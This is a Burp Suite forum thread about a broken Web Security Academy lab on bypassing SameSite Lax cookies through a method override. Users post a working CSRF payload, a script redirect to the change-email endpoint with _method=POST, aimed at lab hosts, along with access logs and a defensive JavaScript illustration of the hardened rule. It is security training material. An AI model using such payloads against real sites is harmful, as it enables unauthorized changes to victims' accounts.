Burp Suite User Forum

SameSite Lax bypass via method override Lab Broken

Z3r0 | Last updated: Jul 13, 2024 03:59PM UTC

This lab is broken: when sending the payload to the victim (the correct one listed in the solution and with a different mail) the victim simply does not visit it, as you can see in the access log, where I don't see an IP address other than my own. I have tried restarting the lab and changing the browser but it doesn't work either.

- Payload

```
<html>
  <body>
    <script>
      document.location="https://0ab600b403cffccd80ba7c7b008700a5.web-security-academy.net/my-account/change-email?email=abcd%40gmail.com&_method=POST"
    </script>
  </body>
</html>
```

- Access log

```
MY_IP 2024-07-13 15:49:39 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:49:40 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:13 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:13 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:15 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:15 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:20 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:20 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:26 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:26 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:50:26 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:53:49 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:18 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:18 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:20 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:20 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:25 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:25 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
MY_IP 2024-07-13 15:54:58 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
```
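
Why a GET navigation carrying `_method=POST`, as in the payload above, ends up treated as a state change, and a server-side rule that stops it. This is an added example, not part of the original post and not PortSwigger's lab code; the request objects, the `app.example` host and all function names are constructed for illustration.

```javascript
// Added illustration; not code from the lab. Requests are constructed objects:
// { method, url, crossSite, topLevelNav }. Host app.example is a placeholder.
const SAFE = new Set(["GET", "HEAD", "OPTIONS", "TRACE"]);
const OVERRIDABLE = new Set(["POST", "PUT", "PATCH", "DELETE"]);

function overrideParam(req) {
  const value = new URL(req.url, "https://app.example").searchParams.get("_method");
  return value ? value.toUpperCase() : null;
}

// Browser side: a cookie set with explicit SameSite=Lax is attached to a
// cross-site request only for a top-level navigation using a safe method.
function laxCookieSent(req) {
  if (!req.crossSite) return true;
  return req.topLevelNav && SAFE.has(req.method.toUpperCase());
}

// Weak server rule: _method rewrites the method of any request, GET included.
function resolveWeak(req) {
  return overrideParam(req) || req.method.toUpperCase();
}

// Hardened rule: only a request that is POST on the wire may be overridden,
// so a GET stays a GET whatever its query string says.
function resolveHardened(req) {
  const wire = req.method.toUpperCase();
  const wanted = overrideParam(req);
  if (wire === "POST" && wanted && OVERRIDABLE.has(wanted)) return wanted;
  return wire;
}

// The email change runs only with a session cookie and an effective POST.
function emailChangeRuns(req, resolve) {
  return laxCookieSent(req) && resolve(req) === "POST";
}

const changePath = "/my-account/change-email?email=a%40example.com";
const samples = {
  navGetOverride: { method: "GET", url: changePath + "&_method=POST", crossSite: true, topLevelNav: true },
  crossSitePost: { method: "POST", url: changePath, crossSite: true, topLevelNav: true },
  sameSitePost: { method: "POST", url: changePath, crossSite: false, topLevelNav: true },
};

for (const [name, req] of Object.entries(samples)) {
  console.log(name, "weak:", emailChangeRuns(req, resolveWeak),
    "hardened:", emailChangeRuns(req, resolveHardened));
}
```

The hardened rule complements, and does not replace, a CSRF token check on the email-change endpoint.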

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 01:00PM UTC

Hi,

If you use a standard version of Chrome, does this then allow you to solve this particular lab?

Z3r0 | Last updated: Jul 23, 2024 06:51PM UTC

Same thing

Ben, PortSwigger Agent | Last updated: Jul 24, 2024 07:36AM UTC

Hi,

Are you able to provide us with some details of the payload and browser you are using?

Haxmaul | Last updated: Aug 29, 2024 05:23PM UTC

Mine shows delivered to victim but still not getting the Solved check mark. No issues with other labs so far. Anyone figure this out? Tested using Burp's browser and my Chrome (Version 128.0.6613.114 (Official Build) (64-bit)); when I "view exploit" it updates my email as it should.

```
<html>
  <body>
    <script>
      document.location="https://0a4a00b803a634ed819fa1bb01cf0061.web-security-academy.net/my-account/change-email?email=3abcdfghertfg%40gmail.com&_method=POST"
    </script>
  </body>
</html>
```

Dominyque, PortSwigger Agent | Last updated: Aug 30, 2024 09:15AM UTC

Hi Haxmaul,

If you do not URL encode the email address, does this then work? Additionally, are you categorically sure that you are changing the email address in your exploit, after you view the exploit and before delivering it to the victim?

Haxmaul | Last updated: Aug 30, 2024 06:07PM UTC

I just went back and did it exactly the same as before and it worked. I also ran into a lab today where the victim wasn't visiting my exploit server as Z3r0 mentioned in the original post. I was able to get past this bug and solve the challenge as well. It seems the current solution is to close the lab in all browser instances and relaunch the lab so you get a new lab ID. Then just redo/paste your exploit in the new lab environment (ensure you update lab ID in your exploit script) and it should work. I'm really enjoying the labs and this is a pretty easy fix for the very few issues (2) I've come across.